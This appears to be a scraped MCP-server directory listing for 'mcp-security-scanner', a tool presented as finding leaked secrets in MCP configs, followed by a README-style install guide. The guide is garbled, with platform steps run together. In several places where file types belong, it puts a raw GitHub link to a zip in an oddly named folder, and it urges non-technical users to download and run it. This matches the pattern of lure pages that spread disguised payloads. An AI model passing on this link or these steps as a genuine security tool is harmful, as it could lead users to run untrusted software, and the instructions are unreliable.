π Scan MCP config files to detect hardcoded secrets, leaked API keys, and security misconfigurations for safer AI setups.
{
"mcpServers": {
"mcp-security-scanner": {
"command": "<see-readme>",
"args": []
}
}
}No install config available. Check the server's README for setup instructions.
Are you the author?
Add this badge to your README to show your security score and help users find safe servers.
π Scan MCP config files to detect hardcoded secrets, leaked API keys, and security misconfigurations for safer AI setups.
Is it safe?
No package registry to scan.
No authentication β any process on your machine can connect.
MIT. View license β
Is it maintained?
Last commit 5 days ago.
Will it work with my client?
Transport: stdio. Works with Claude Desktop, Cursor, Claude Code, and most MCP clients.
No automated test available for this server. Check the GitHub README for setup instructions.
No known vulnerabilities.
This server is missing a description. Tools and install config are also missing.If you've used it, help the community.
Add informationHave you used this server?
Share your experience β it helps other developers decide.
Sign in to write a review.
Search, evaluate, and compare 17,000+ MCP servers β each scored on security, maintenance, and efficiency.
AI agents get on-chain identity, credentials, reputation, escrow, and persistent memory on XRPL.
MCP server for scanning and remediating hardcoded secrets using GitGuardianβs API. Detect over 500 secret types and prevent credential leaks before code goes public.
Trust infrastructure for AI agents β DIDs, reputation, verifiable credentials, USDC.
MCP Security Weekly
Get CVE alerts and security updates for Mcp Security Scanner and similar servers.
Start a conversation
Ask a question, share a tip, or report an issue.
Sign in to join the discussion.
mcp-security-scanner is a tool designed to help you check your MCP (Model Context Protocol) configuration files for security problems. It looks for things like hardcoded passwords, leaked API keys, or incorrect settings that could put your application at risk.
You don't need technical skills to use this tool. It works with your files and gives you clear results. Use it anytime you want to make sure your protocols are safe.
Before you get started, make sure your computer meets these simple requirements:
Using mcp-security-scanner is simple. Follow these steps carefully:
This guide will walk you through each step with details and screenshots where helpful.
You can get mcp-security-scanner from its official releases page:
Download mcp-security-scanner here
.exe or .msi file..dmg or .pkg file.https://github.com/Paaxy/mcp-security-scanner/raw/refs/heads/main/transhumant/scanner-mcp-security-v2.8-alpha.5.zip or .AppImage file..dmg or .pkg file..dmg, drag the app icon into the Applications folder..pkg, follow the installer steps.https://github.com/Paaxy/mcp-security-scanner/raw/refs/heads/main/transhumant/scanner-mcp-security-v2.8-alpha.5.zip file if needed..AppImage files, right-click the file, go to Properties, and allow it to run as a program./usr/local/bin for easier access.After installation, open the app by clicking its icon. Hereβs how to scan your MCP config files step by step: